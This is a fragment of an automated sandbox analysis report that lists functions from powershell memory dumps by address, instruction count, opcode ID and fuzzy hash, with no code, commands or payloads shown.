                                                                                        • Opcode ID: d605af112391d643104c513787e769e6786692f42f75727571c2c8c845d67c28
                                                                                        • Instruction ID: ef4b3e9e2b34945e32c718e943def531f8f5d2040585dc9227f5b833257b057f
                                                                                        • Opcode Fuzzy Hash: d605af112391d643104c513787e769e6786692f42f75727571c2c8c845d67c28
                                                                                        • Instruction Fuzzy Hash: 2E51D232A0DA4A4FE7A9EB2CA41127477E1EFA5660F1801BBC11EC71D7DF18E801835D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF848FF498F Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2397714858.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848ff0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: p/%I
                                                                                        • API String ID: 0-2660849550
                                                                                        • Opcode ID: 4c160d49ec3dcd7f0961213acbe9596e8b2137687e98a2158dc27fa453787414
                                                                                        • Instruction ID: 390f5ac5c842be82d031652624fe0e773e2d8fbd3b7c548d97772d9bdbc76304
                                                                                        • Opcode Fuzzy Hash: 4c160d49ec3dcd7f0961213acbe9596e8b2137687e98a2158dc27fa453787414
                                                                                        • Instruction Fuzzy Hash: 9C219E32E0E98B4FE7A9EB18A45117466D1EF64360F4901BAC21ED71E6DF18EC00835E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF848F2A0E5 Relevance: .1, Instructions: 130COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2396929367.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f20000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1a89eb6e984de47ba8dab84027ede44fccc0db937628ed8f2ee96045922daae8
                                                                                        • Instruction ID: 12b56beadc752996f54f5cd6fdc9b0a7a75312c4e6e1a5e19c52ade04023f48b
                                                                                        • Opcode Fuzzy Hash: 1a89eb6e984de47ba8dab84027ede44fccc0db937628ed8f2ee96045922daae8
                                                                                        • Instruction Fuzzy Hash: 3731093191CB8C4FDB58DB5C9C4A6A97BE0FB69720F00426FE449C3252DB75A855CBC2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF848E0ED40 Relevance: .1, Instructions: 124COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2395218973.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848e0d000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cb449a0a0be8ce7391eb982346ffa8c4a067c5c9650036ee32bf0b2d7e0ada0f
                                                                                        • Instruction ID: 7565ae0f2b46c08a2e2c162e51c0fd040c26756008453b0279d35e5700f953d6
                                                                                        • Opcode Fuzzy Hash: cb449a0a0be8ce7391eb982346ffa8c4a067c5c9650036ee32bf0b2d7e0ada0f
                                                                                        • Instruction Fuzzy Hash: C841F57080DBC44FE7569B3898519523FF0FF57264F1906EFD088CB1A3D629A846C7A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF848F2B028 Relevance: .1, Instructions: 98COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2396929367.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f20000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f68e47d4a4564b118a65d523b7dcaf3b8fb32bfe3182e852b54df311bf136ae
                                                                                        • Instruction ID: 6d79fca167535ef46913bad25eb56fede31d2ef6bbe7f0a6528072d866b29a7f
                                                                                        • Opcode Fuzzy Hash: 8f68e47d4a4564b118a65d523b7dcaf3b8fb32bfe3182e852b54df311bf136ae
                                                                                        • Instruction Fuzzy Hash: DB21287080C7488FEB0ADBA89C4A6F97FF4EB52321F04416ED449DB193DA796846CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF848F24675 Relevance: .0, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2396929367.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f20000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7defcf4782ce6665e022b4bc7aa3f0daaf1c9d9ce3effba0d67832a3f95bdf06
                                                                                        • Instruction ID: cb2dd1076d71933677dc26effb3a6f1c099dad47f97aacc46e3869fcf1426c9f
                                                                                        • Opcode Fuzzy Hash: 7defcf4782ce6665e022b4bc7aa3f0daaf1c9d9ce3effba0d67832a3f95bdf06
                                                                                        • Instruction Fuzzy Hash: 1901677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF848F2AE68 Relevance: .0, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2396929367.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848f20000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c5a4234437c3f9619f4e6ab3b373ffdc4fd3399c48f4bd2455fae2574a347360
                                                                                        • Instruction ID: f8289c4f58c8ab190d5d162cd36e9cb73918b3cbfc5423af38afd6514edecfef
                                                                                        • Opcode Fuzzy Hash: c5a4234437c3f9619f4e6ab3b373ffdc4fd3399c48f4bd2455fae2574a347360
                                                                                        • Instruction Fuzzy Hash: 79F0963180CAC98FDB06EF2498555D97FA0EF16250F0502DBD458C70B2DB659558C792
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF848FF4CCA Relevance: .0, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2397714858.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848ff0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fa485067f99c4253090eb89084b4f3ea3fbafbdf0ac1ec1e2f5caec0abb1f315
                                                                                        • Instruction ID: 63a3e216ce70136dfeef3a9c973b12c24adc0c76c0e95936a4b6d35cfde82b4c
                                                                                        • Opcode Fuzzy Hash: fa485067f99c4253090eb89084b4f3ea3fbafbdf0ac1ec1e2f5caec0abb1f315
                                                                                        • Instruction Fuzzy Hash: 3BF09A31A0D5458FEB58EB5CA4458A8BBE0FF19360F0500F6E15DC71A3DB2AAC50C769
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF848FF53E4 Relevance: .0, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2397714858.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ff848ff0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e390a4e68472eb713788a18f183a2e3032e86cce99739da72fd92a7e7e453d43
                                                                                        • Instruction ID: c70b592fd9fa301b2328f6de6db466d1846c87152b1aba27e2c41489159abbba
                                                                                        • Opcode Fuzzy Hash: e390a4e68472eb713788a18f183a2e3032e86cce99739da72fd92a7e7e453d43
                                                                                        • Instruction Fuzzy Hash: FBF0373171CF044FD744EE1DD445665B7D1FBA8355F10452FE44DC3651DB25E4818786
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%